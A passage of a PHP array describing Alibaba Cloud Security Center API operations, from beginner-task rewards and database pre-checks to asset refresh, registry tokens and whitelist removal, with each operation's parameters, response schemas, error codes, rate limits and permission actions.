days'."\n" .'- **imageScanAuthCount**: the image scan authorization quota'."\n" .'- **honeypotAuthCount**: the cloud honeypot authorization quota.', 'type' => 'string', 'example' => '{"days":60,"ransomwareCapacity":10}', 'title' => ''], 'IsRewardTaked' => ['description' => 'The claim status. Valid values:'."\n" .'- **1**: Not claimed.'."\n" .'- **2**: Claimed.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'SecurityScore' => ['description' => 'The security score increase that can be gained by completing this task.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query beginner task information', 'summary' => 'Security Center provides rewards such as value-added service authorization quotas and log analysis storage capacity to users who complete tasks. Queries the completion status and reward information of configuration tasks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGuidTaskList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:QueryGuidTaskList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447D****\\",\\n \\"GuideTaskConfigList\\": [\\n {\\n \\"Status\\": 0,\\n \\"TaskTypeName\\": \\"guide_sub_task_config_add_collection\\",\\n \\"TaskId\\": 0,\\n \\"RewardData\\": {\\n \\"Reward\\": \\"addAntiRansomwareCapacity\\",\\n \\"RewardConfig\\": \\"{\\\\\\"days\\\\\\":60,\\\\\\"ransomwareCapacity\\\\\\":10}\\",\\n \\"IsRewardTaked\\": \\"1\\"\\n },\\n \\"SecurityScore\\": 80\\n }\\n ]\\n}","type":"json"}]', ], 'QueryJenkinsImageRegistryPersistenceDay' => [ 'summary' => 'Queries the image retention duration of a Jenkins image repository.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '113.83.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The result data of the repository retention duration.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The repository retention duration. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'EA4AC8B7-0C18-5BC1-9DA4-798B3BE4****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed for the execution. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query jenkins image repository image retention duration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryJenkinsImageRegistryPersistenceDay'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryJenkinsImageRegistryPersistenceDay', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 30,\\n \\"RequestId\\": \\"EA4AC8B7-0C18-5BC1-9DA4-798B3BE4****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'QueryPreCheckDatabase' => [ 'summary' => 'Queries the task result of a database dry run node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the database pre-check task.'."\n" .'> You can call the [StartPreCheckDatabase](~~StartPreCheckDatabase~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 't-000bc9nqwxsbyvod****', 'title' => ''], ], [ 'name' => 'InstanceUuid', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the server database backup client.'."\n" .'> You can call the [DescribeUniBackupDatabase](~~DescribeUniBackupDatabase~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ebc895506c6911ed800000163e0e****', 'title' => ''], ], [ 'name' => 'UniRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the database server.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****', 'title' => ''], 'Progress' => ['description' => 'The pre-check progress. Valid values: 0 to 100.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Result' => ['description' => 'The task result of the dry run node. The value is a JSON string. The KEY valid values are:'."\n" ."\n" .'- **instanceId**: the instance ID of the server where the database resides.'."\n" .'- **checkTime**: the dry run time.'."\n" .'- **sourceType**: the database type.'."\n" .'- **results**: the dry run items and task results.'."\n" .' - **item**: the dry run item.'."\n" .' - **result**: the dry run task result.'."\n" ."\n" .'> Dry run item description'."\n" .'> - MSSQL'."\n" .'> - **OSS\\_INTERNAL\\_ENDPOINT\\_CONNECTIVITY**: OSS connectivity check. '."\n" .'> - **SERVICE\\_CONNECTIVITY**: control network connectivity check.'."\n" .'> - **SQL\\_SERVER\\_DB\\_IN\\_SIMPLE\\_RECOVERY\\_MODE**: recovery mode check.'."\n" .'> - **SQL\\_SERVER\\_DB\\_NOT\\_ONLINE**: SQL Server database status check.'."\n" .'> - ORACLE'."\n" .'> - **OSS\\_INTERNAL\\_ENDPOINT\\_CONNECTIVITY**: OSS connectivity check. '."\n" .'> - **SERVICE\\_CONNECTIVITY**: control network connectivity check.'."\n" .'> - **ORACLE\\_INSTANCE\\_STATUS**: Oracle instance status check.'."\n" .'> - **ORACLE\\_DB\\_STATUS**: Oracle database status check.'."\n" .'> - **ARCHIVELOG**: archive mode check.'."\n" .'> - MYSQL'."\n" .'> - **OSS\\_INTERNAL\\_ENDPOINT\\_CONNECTIVITY**: OSS connectivity check. '."\n" .'> - **SERVICE\\_CONNECTIVITY**: control network connectivity check.'."\n" .'> - **MYSQL\\_VERSION**: version check for full backup support.'."\n" .'> - **MYSQL\\_BINLOG**: BINLOG check.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "instanceId": "i-wz91if83t97xgtn2****",'."\n" .' "checkTime": 1671245753,'."\n" .' "sourceType": "MSSQL",'."\n" .' "results":'."\n" .' ['."\n" .' {'."\n" .' "item": "OSS_INTERNAL_ENDPOINT_CONNECTIVITY",'."\n" .' "result": "PASSED"'."\n" .' },'."\n" .' {'."\n" .' "item": "SERVICE_CONNECTIVITY",'."\n" .' "result": "PASSED"'."\n" .' },'."\n" .' {'."\n" .' "item": "SQL_SERVER_DB_IN_SIMPLE_RECOVERY_MODE",'."\n" .' "result": "WARNING"'."\n" .' },'."\n" .' {'."\n" .' "item": "SQL_SERVER_DB_NOT_ONLINE",'."\n" .' "result": "PASSED"'."\n" .' }'."\n" .' ]'."\n" .' }'."\n" .']', 'title' => ''], 'CompletedTime' => ['description' => 'The time when the pre-check was completed.', 'type' => 'integer', 'format' => 'int64', 'example' => '1657524396', 'title' => ''], 'Description' => ['description' => 'The status description of the pre-check task. Valid values:'."\n" ."\n" .'- **completed**: Completed.'."\n" .'- **created**: Started.'."\n" .'- **error**: Pre-check failed.', 'type' => 'string', 'example' => 'completed', 'title' => ''], 'UpdatedTime' => ['description' => 'The time when the pre-check was last updated.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671084106', 'title' => ''], 'CreatedTime' => ['description' => 'The time when the pre-check started.', 'type' => 'integer', 'format' => 'int64', 'example' => '1660448660', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query database pre-check task result', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryPreCheckDatabase'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:QueryPreCheckDatabase', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"Progress\\": 100,\\n \\"Result\\": \\"[\\\\n {\\\\n \\\\\\"instanceId\\\\\\": \\\\\\"i-wz91if83t97xgtn2****\\\\\\",\\\\n \\\\\\"checkTime\\\\\\": 1671245753,\\\\n \\\\\\"sourceType\\\\\\": \\\\\\"MSSQL\\\\\\",\\\\n \\\\\\"results\\\\\\":\\\\n [\\\\n {\\\\n \\\\\\"item\\\\\\": \\\\\\"OSS_INTERNAL_ENDPOINT_CONNECTIVITY\\\\\\",\\\\n \\\\\\"result\\\\\\": \\\\\\"PASSED\\\\\\"\\\\n },\\\\n {\\\\n \\\\\\"item\\\\\\": \\\\\\"SERVICE_CONNECTIVITY\\\\\\",\\\\n \\\\\\"result\\\\\\": \\\\\\"PASSED\\\\\\"\\\\n },\\\\n {\\\\n \\\\\\"item\\\\\\": \\\\\\"SQL_SERVER_DB_IN_SIMPLE_RECOVERY_MODE\\\\\\",\\\\n \\\\\\"result\\\\\\": \\\\\\"WARNING\\\\\\"\\\\n },\\\\n {\\\\n \\\\\\"item\\\\\\": \\\\\\"SQL_SERVER_DB_NOT_ONLINE\\\\\\",\\\\n \\\\\\"result\\\\\\": \\\\\\"PASSED\\\\\\"\\\\n }\\\\n ]\\\\n }\\\\n]\\",\\n \\"CompletedTime\\": 1657524396,\\n \\"Description\\": \\"completed\\",\\n \\"UpdatedTime\\": 1671084106,\\n \\"CreatedTime\\": 1660448660\\n}","type":"json"}]', ], 'RebootMachine' => [ 'summary' => 'Restarts an instance. Currently, only Windows instances are supported.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server that you want to restart.'."\n" .'>Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '7151f27e-1d51-4e98-a540-8936a****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '151F6EB6-D5F3-417A-AF7B-4D84975DB586', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Restart an instance', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RebootMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RebootMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"151F6EB6-D5F3-417A-AF7B-4D84975DB586\\"\\n}","type":"json"}]', ], 'ReceiveFunctionTrialRewardByAliUid' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '137520', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'FunctionName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the trial feature. Valid values:'."\n" .'- **trail_honeypot_reward**: cloud honeypot'."\n" .'- **trail_file_detect_api_reward**: malicious file detection SDK.', 'type' => 'string', 'required' => false, 'example' => 'trail_honeypot_reward'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. The value is a unique identifier that Alibaba Cloud generates for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '94004FDB-27EC-5666-83D4-D0C5C624****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Start cloud honeypot or malicious file detection SDK trial', 'summary' => 'Claims a trial reward for the cloud honeypot or malicious file detection SDK feature after completing a task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ReceiveFunctionTrialRewardByAliUid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ReceiveFunctionTrialRewardByAliUid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"94004FDB-27EC-5666-83D4-D0C5C624****\\"\\n}","type":"json"}]', ], 'RefreshAssets' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92427', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The type of the asset that you want to synchronize. Valid values:'."\n" ."\n" .'* **cloud_product**: Alibaba Cloud service'."\n" .'* **ecs**: Elastic Compute Service (ECS) instance'."\n" .'* **container_image**: container image'."\n", 'type' => 'string', 'required' => false, 'example' => 'cloud_product', 'title' => ''], ], [ 'name' => 'CloudAssetType', 'in' => 'query', 'schema' => ['description' => 'The type of the cloud service. Valid values:'."\n" ."\n" .'* **0**: ECS'."\n" .'* **1**: Server Load Balancer (SLB)'."\n" .'* **3**: ApsaraDB RDS'."\n" .'* **4**: ApsaraDB for MongoDB (MongoDB)'."\n" .'* **5**: ApsaraDB for Redis (Redis)'."\n" .'* **6**: Container Registry'."\n" .'* **8**: Container Service for Kubernetes (ACK)'."\n" .'* **9**: Virtual Private Cloud (VPC)'."\n" .'* **11**: ActionTrail'."\n" .'* **12**: Alibaba Cloud CDN (CDN)'."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'* **14**: Apsara Devops'."\n" .'* **15**: Resource Access Management (RAM)'."\n" .'* **16**: Anti-DDoS'."\n" .'* **17**: Web Application Firewall (WAF)'."\n" .'* **18**: Object Storage Service (OSS)'."\n" .'* **19**: PolarDB'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" .'* **21**: Microservices Engine (MSE)'."\n" .'* **22**: File Storage NAS (NAS)'."\n" .'* **23**: Data Security Center (DSC)'."\n" .'* **24**: Elastic IP Address (EIP)', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'CloudAssetSubType', 'in' => 'query', 'schema' => ['description' => 'The subtype of the cloud service.'."\n" ."\n" .'> The following list describes the subtypes of cloud services.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The type of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: a third-party cloud asset'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: an asset provided by another cloud'."\n" .'* **8**: a lightweight asset'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '340D7FC4-D575-1661-8ACD-CFA7BE57B795', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'DuplicatedRefresh', 'errorMessage' => 'Refresh in progress, please wait.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'RefreshAssets', 'summary' => 'Synchronizes assets.', 'requestParamsDescription' => '| Cloud asset type | Cloud service subtype | Service name | Sub-service name | :---- :| : ----: | :----: | : ---- : | 0 | 0 | ECS | Instance 0 | 1 | Disk (storage) | Disk (storage) 0 | 2 | Security group | Security group 1 | 0 | SLB | SLB 1 | 1 | SLB | ALB 3 | 0 | ApsaraDB RDS | Instance 4 | 0 | MongoDB | Instance 5 | 0 | Redis | Instance 6 | 1 | Container Registry | Enterprise Edition 6 | 2 | Container Registry | Personal Edition 8 | 0 | ACK | Cluster 9 | 0 | VPC | NAT gateway 9 | 1 | VPC | EIP 9 | 2 | VPC | VPN 11 | 0 | ActionTrail | Tracking 12 | 0 | CDN | Instance 13 | 0 | Certificate Management Service (formerly SSL Certificates Service) | Certificate 14 | 0 | Apsara Devops | Organization 15 | 0 | RAM | Account alias 15 | 1 | RAM | User 15 | 2 | RAM | Policy 15 | 3 | RAM | Group 16 | 0 | Anti-DDoS | Instance 17 | 1 | WAF | Domain name 18 | 0 | OSS | Bucket 19 | 0 | PolarDB | Cluster 20 | 0 | ApsaraDB RDS for PostgreSQL | Instance 21 | 0 | MSE | Cluster 22 | 0 | NAS | File system 23 | 0 | DSC | Instance 24 | 0 | EIP | Anycast EIP'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshAssets'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RefreshAssets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"340D7FC4-D575-1661-8ACD-CFA7BE57B795\\"\\n}","type":"json"}]', ], 'RefreshContainerAssets' => [ 'summary' => 'Refreshes container asset data in the asset center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The Asset Type of the container asset to refresh. Valid values:'."\n" .'- **IMAGE**: container image.'."\n" .'- **CONTAINER**: container.', 'type' => 'string', 'required' => true, 'example' => 'IMAGE', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '2090F329-3658-49AF-820B-C4157FC31BCB', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Refresh container asset data in the asset center', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshContainerAssets'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RefreshContainerAssets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2090F329-3658-49AF-820B-C4157FC31BCB\\"\\n}","type":"json"}]', ], 'RefreshOssBucketScanInfo' => [ 'summary' => 'Refreshes the bucket list.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '174757', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The system generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE290C1F-4B7D-5024-9D2F-E26D7B08****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Refresh bucket list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshOssBucketScanInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:RefreshOssBucketScanInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE290C1F-4B7D-5024-9D2F-E26D7B08****\\"\\n}","type":"json"}]', ], 'RefreshRegistryToken' => [ 'summary' => 'Updates an image token.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92430', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.'."\n" ."\n" .'> You can call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The returned token.'."\n", 'type' => 'string', 'example' => '77ba3bf5-af95-4b77-aa94-***********', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": \\"77ba3bf5-af95-4b77-aa94-***********\\",\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', 'title' => 'RefreshRegistryToken', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshRegistryToken'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:RefreshRegistryToken', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'RemoveCheckInstanceResultWhiteList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '119345', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance ID to query. Separate multiple instance IDs with commas (,).', 'type' => 'array', 'items' => ['description' => 'The instance ID to query. Separate multiple instance IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'i-bp10nif8f6ice2qvacqu', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'RemoveCheckInstanceResultWhiteListResponse', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F156EA41-8EEF-54B2-908B-EAE071XXXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Remove whitelist status at the instance dimension', 'summary' => 'Removes the whitelist status at the instance dimension.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RemoveCheckInstanceResultWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:RemoveCheckInstanceResultWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => 